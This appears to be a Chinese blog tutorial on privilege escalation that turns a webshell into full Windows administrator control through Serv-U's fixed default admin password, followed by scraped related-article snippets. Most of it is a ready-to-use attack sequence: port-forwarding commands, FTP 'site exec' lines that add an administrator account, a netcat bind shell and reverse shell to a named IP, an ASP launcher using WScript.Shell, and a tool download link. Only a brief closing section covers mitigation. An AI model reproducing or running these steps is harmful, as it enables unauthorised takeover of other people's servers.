服务器系统获取最高权限,webshell+serv-u获取系统最高权限
下面详细说说webshell+serv-u获取系统最高权限的方法及补救方法。
原理:
serv-u默认监听127.0.0.1:43958,在本机才能连接这个管理端口,serv-u默认管理账号是LocalAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码是固定的。在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"serv-u administrator"新建SERVER,
目标IP:12345
User:LocalAdministrator
Pass:"#l@$ak#.lk;0@P"
那么目标机器的serv-u就归你管了。
利用的前提:要有目标机器的普通权限的SHELL,不需要能终端或物理控制台登录,只要有个shell,能运行端口数据转发的程序就可以了
如何得到一个shell:sql注射得到webshell或者直接利用动网7.0 sp2以下的上传漏洞上传webshell
具体实施方法:
1.利用得到的webshell上传转向程序fpipe,然后执行fpipe -v -l 12345 -r 43958 127.0.0.1
2 .在你自己的机器,用"serv-u administrator"新建SERVER,依次填入
ip:目标IP
端口 :12345
User:LocalAdministrator
Pass:"#l@$ak#.lk;0@P"
现在你就可以管理这台服务器的serv-u了,新建一个账号,权限为系统管理员(system administrator),并在"目录访问(Dir access)"选项中给予"执行"权限(execute).
3. ftp连接,然后执行quote site exec net user iisuser password /add
添加一个用户名为iisuser密码为password的用户,加到管理员组 quote site exec net localgroup administrators iisuser /add,现在就可以连接终端并登录了。
当然也可以进行别的操作,例如上传一个nc.exe,在目标机器上得到一个管理员权限的shell,可以正向连接,也可以反向连接。
正向连接:连上ftp以后执行 quote site exec nc.exe -l -p 23 -t -e cmd.exe
这时目标主机就成了一台telnet服务器,你可以telnet上目标服务器的23端口.
反向连接:假设你的IP是202.96.209.168
1.先在自己的机器上运行(你要有一个外部IP):nc -vv -lp 99
2.在目标机器上运行 nc -e cmd.exe 202.96.209.168 99
在你的机器上就会得到一个目标机器的具有管理员权限的shell
如果对方进行了端口过滤或者设置了防火墙的保护(这种保护不限制反弹连接,如果限制的话就要换别的方法呢),可以用TCP SOCKET转发来实现
打个比方:
我的机器为 A
我要测试的机器为 B[不允许正面连接]
我已经在B上得到呢一个SHELL[只要guest的就行呢]
我们可以这样连上对方的43958
I:我在本地监听二个端口23和56
23是等待B来连接的~
56是等待我来连接的~
II:B连接我监听的23,同时转发到本地的43958
这样管道就建好呢~对方的防火墙就拿我们没有办法呢~
此时在本地运行SERV-U新建一个SERVER,IP填上本地的127.0.0.1端口为56,用户名LocalAdministrator,密码#l@$ak#.lk;0@P
具体实施方法:
假设你的IP是 202.96.209.168
1.在你自己的机器上运行 htran.exe -listen 23 56
2.此时在本地运行SERV-U新建一个SERVER,IP填上本地的127.0.0.1端口为56,用户名LocalAdministrator,密码#l@$ak#.lk;0@P
3。在目标机器上运行 htran.exe -slave 127.0.0.1 43958 202.96.209.168 23
如果不能在webshell下直接运行,可以写一个asp脚本来执行,内容如下
connect.asp
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
oScript.Run (server.mappath("htran")&" -slave 127.0.0.1 43958 202.96.209.168 23 ")
%>
执行http://目标网址/connect.asp,如果出来一片空白,没提示什么错误,现在你应该可以管理目标服务器的serv-u了
余下的事情就看您自由发挥了。
htran.exe是一个多线程包转发工具,可以到红盟下载http://www.cnhonker.com/download/releases/Tools/HTran.rar
防止方法:
自己给serv-u打补丁,改变默认端口及管理密码。改密码要修改ServUAdmin.exe,ServUDaemon.exe这两个文件,改端口只要在ServUDaemon.ini文件[GLOBAL]选项中加入LocalSetupPortNo=12345即可
很遗憾,在serv-u的最新版本serv-u 5.2.0.0中依然没有任何改变,默认的管理端口及密码还是原来的。
服务器系统获取最高权限,webshell+serv-u获取系统最高权限相关推荐
- 服务器无法拖动文件复制文件,IT服务器运维:艾锑人为您整理Win10系统下移动、复制、删除文件需要管理员权限的解决方法...
影响我们一生百倍差距的四大效应 观察者效应:你的世界是什么样是由你的观察决定的. 这个效应是在[潜能突破]研习营课堂上发现的,我们有个练习叫三生万物,每个人都会成为一次观察者角色,当大家在成为其他角色 ...
- centos系统ftp服务器的目录权限,CentOS7 添加FTP用户并设置权限
step 1 安装配置Vsftp服务器 一.配置防火墙,开启FTP服务器需要的端口 CentOS 7.0默认使用的是firewall作为防火墙,这里改为iptables防火墙. 1.关闭firewal ...
- xp系统怎么关dhcp服务器,怎样解决Win XP操作系统DHCP故障:获取未使用的IP地址
怎样解决Win XP操作系统DHCP故障:获取未使用的IP地址 发布时间:2011-05-12 14:57:29 作者:佚名 我要评论 在我们解决Windows 操作系统的DHCP故障时,有时 ...
- 权限提升-网站权限后台漏洞第三方获取
小迪 https://www.bilibili.com/video/BV1JZ4y1c7ro?p=57 案例一看思路 某外挂网站后台,未知网站查找功能点,如下应该是使用的站帮主CMS,下载源码分析. ...
- 【服务器防护】WEB防护 - WEBSHELL攻击探测【转载】
1.概述 笔者一直在关注webshell的安全分析,最近就这段时间的心得体会和大家做个分享. webshell一般有三种检测方式: 基于流量模式基于agent模式(实质是直接分析webshell文件) ...
- 【struts2+hibernate+spring项目实战】java监听器实现权限控制系统和资源获取优化(ssh)
一.权限控制系统 权限控制系统即用户登录后,如果操作了不能访问的操作,系统将其拦截. 权限控制系统设计需求: 系统功能并不是所有功能都需要被控制,例如登录功能无需校验 设计方案:资源中没有出现的功能将 ...
- 角色权限(Role)和系统权限(System)的几个澄清实验
数据库安全是一个内容丰富的体系结构,其中访问控制和操作控制是安全体系的重要内容.Oracle数据库作为目前最成熟的商用数据库产品,其安全访问体系是行业界普遍接受的标准. Oracle数据库权限体系是一 ...
- 系统接口502异常_基于SpringBoot2.0的后台权限管理系统
简介 基于SpringBoot2.0的后台权限管理系统界面简洁美观敏捷开发系统架构.核心技术采用Spring.MyBatis.Shiro没有任何其它重度依赖. 互联网云快速开发框架,微服务分布式代码生 ...
- 服务器2003添加共享文档权限,Windows2003使用命令行设置共享权限与安全权限心得...
Windows2003使用命令行设置共享权限与安全权限心得 Windows2003安装计算机等级考试系统,按系统说明对考试服务器进行安装.在安装过程中,需在服务器上创建大量考试用户和考生文件夹,且需对 ...
- Linux系统学习: 用户和权限管理指令: 请简述 Linux 权限划分的原则
权限抽象 一个完整的权限管理体系,要有合理的抽象.这里就包括对用户.进程.文件.内存.系统调用等抽象.下面我将带你一一了解. 首先,我们先来说说用户和组.Linux 是一个多用户平台,允许多个用户同时 ...
最新文章
- webpack-插件机制杂记
- i3wm amxier toggle只关闭不开启问题解决
- NSURLConnection和NSRunLoop
- BZOJ 2440 完全平方数(莫比乌斯-容斥原理)
- java x.length_Java中的length和length()
- 好程序员训练营-Java变量的作用域
- SAP License:选择ERP系统的诀窍
- 【白皮书分享】2022年中国品质直播选型与应用白皮书.pdf(附下载链接)
- 上海电力学院计算机组成与结构试卷,上海电力学院试卷及成绩管理办法
- python+opencv简单人脸识别(源码)(有手就行)
- 计算机显示器出现黑屏分析
- java毕业设计高校多媒体设备报修管理系统源码+系统+数据库+lw文档+调试运行
- python计算梯形面积程序编程解题思路_编写程序计算梯形面积
- 算法与数据结构——百度笔试题(一)
- python常用library
- 给到工作的你诗和远方~
- Python-爬虫请求~requsts~get
- 两个栈共享一块存储空间新解
- 用python实现随机选人、选取活动或节目小程序
- Altium Designer 20 (5)——排针类元件创建
热门文章
- 小南说 Promise(是什么,有什么,怎么用,为什么)
- Kotlin代码转换成Java代码
- mscbsc移动通信论坛_中国移动5G资费被确认,流量低至1毛/G, 联通电信又被动,网友:良心价...
- 计算机CPU工作(多核/缓存)原理
- 【职场心路】一个老DBA的自白
- EV代码签名证书可以自助续签吗?
- The page has expired due to inactivity.Please refresh and try again.
- 最新Exsi-6.7.0U3b版本下载
- 事件2 有源码 可以随意进行练习哈 太棒了 一起加油 一起成长
- 如果你有个程序员男友,那么送这12 款键盘绝对不会错